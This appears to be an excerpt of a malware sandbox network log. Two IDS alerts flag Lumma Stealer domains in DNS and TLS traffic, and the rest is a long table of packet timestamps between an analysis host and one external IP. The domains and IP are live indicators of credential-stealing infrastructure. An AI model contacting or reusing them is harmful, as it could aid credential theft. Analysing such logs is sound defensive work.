    2024-08-28T15:29:05.253081+0200 | UDP | 2055479 | ET MALWARE Lumma Stealer Domain in DNS Lookup (locatedblsoqp .shop) | 1 | 64418 | 53 | 192.168.2.7 | 1.1.1.1
    2024-08-28T15:29:06.967216+0200 | TCP | 2055493 | ET MALWARE Lumma Stealer Domain in TLS SNI (traineiwnqo .shop) | 1 | 49705 | 443 | 192.168.2.7 | 188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 28, 2024 15:29:02.055763960 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.060798883 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.060928106 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.064625025 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.069427013 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.716989040 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717014074 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717026949 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717066050 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717077971 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717088938 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717099905 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717113972 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717123032 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.717202902 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.717263937 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717278004 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.717322111 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.721970081 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.722018957 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.722070932 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.814740896 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.814769030 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.814780951 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.814872980 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.814935923 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.814949989 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.815001965 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.815196991 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.815213919 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.815227985 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.815242052 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.815304041 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.815331936 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.815362930 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.815375090 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.815397024 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.816114902 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.816150904 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.816153049 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.816164017 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.816204071 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.816314936 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.816327095 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.816375971 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.816890001 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.816935062 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.816946983 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.816976070 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.817047119 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.817059994 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.817092896 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.817749977 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.817795992 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.819732904 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.872731924 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.905558109 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905574083 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905586004 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905599117 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905611992 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905664921 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.905751944 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.905787945 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905833960 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.905838966 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905852079 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905896902 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.905971050 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905982971 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.905992985 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.906007051 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.906034946 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.906068087 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.906688929 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.906738043 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.906749010 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.906791925 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.906864882 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.906877041 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.906887054 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.906898022 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.906909943 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.906936884 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.907603025 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.907623053 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.907634020 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.907646894 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.907680988 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.907773972 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.907784939 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.907794952 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.907810926 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.907833099 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.907866001 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.908607006 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.908675909 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.908688068 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.908720970 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.908827066 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.908837080 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.908848047 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.908859968 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.908864975 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.908890009 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.909430027 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.909480095 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.909483910 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.909492016 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.909535885 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.909596920 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.909607887 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.909651041 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.993915081 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.993938923 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.993978977 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.993993998 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.994005919 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.994034052 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.994045973 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.994066954 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.994093895 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.994105101 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999643087 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999685049 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.999695063 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999706984 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999717951 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999749899 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.999792099 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999803066 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999833107 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.999907017 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999918938 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999931097 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:02.999953032 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:02.999969959 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.000046968 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000060081 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000070095 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000087976 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000094891 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.000098944 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000123024 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.000617981 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000658035 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.000679970 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000690937 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000727892 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.000818014 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000830889 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000843048 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.000864983 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.001036882 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001080036 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.001105070 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001116991 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001156092 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.001193047 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001204967 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001250029 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.001318932 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001329899 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001342058 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001353979 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001384020 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.001415014 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.001804113 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001822948 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001835108 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001859903 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.001940012 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001951933 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001962900 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.001987934 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.002011061 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.002137899 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002150059 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002160072 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002171040 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002182961 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002186060 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.002209902 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.002731085 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002774000 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.002774000 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002789021 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002829075 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.002896070 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002907991 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002918005 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002928972 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.002945900 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.002974033 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.003031015 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.003087997 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.003101110 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.003112078 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.003129005 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.003150940 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.004400015 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.004425049 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.004436970 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.004472017 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.004523993 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.004535913 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.004545927 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.004561901 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.004580021 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.004605055 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.004627943 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.004638910 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.004674911 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.082458973 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082494020 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082511902 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082521915 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082532883 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082544088 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082566023 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.082617998 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.082645893 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082657099 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082668066 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082679987 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082691908 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082698107 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.082734108 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.082823038 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082839966 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.082861900 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.092267990 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092288017 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092298031 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092318058 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.092341900 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.092422962 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092498064 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092508078 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092535019 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.092742920 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092782974 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.092811108 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092873096 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092911959 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.092952967 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092963934 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.092974901 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093014002 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.093080997 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093094110 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093117952 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.093198061 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093208075 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093224049 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093233109 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093240976 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.093271017 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.093353987 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093367100 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093378067 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093389988 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093394995 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.093436956 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.093493938 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093539000 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093549013 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.093594074 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.097893953 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.097999096 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098009109 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098017931 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098031998 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098042965 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098043919 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.098059893 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098094940 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.098124027 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098136902 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098172903 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
Aug 28, 2024 15:29:03.098237991 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098287106 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098299026 CEST | 80 | 49702 | 147.45.44.131 | 192.168.2.7
Aug 28, 2024 15:29:03.098308086 CEST | 49702 | 80 | 192.168.2.7 | 147.45.44.131
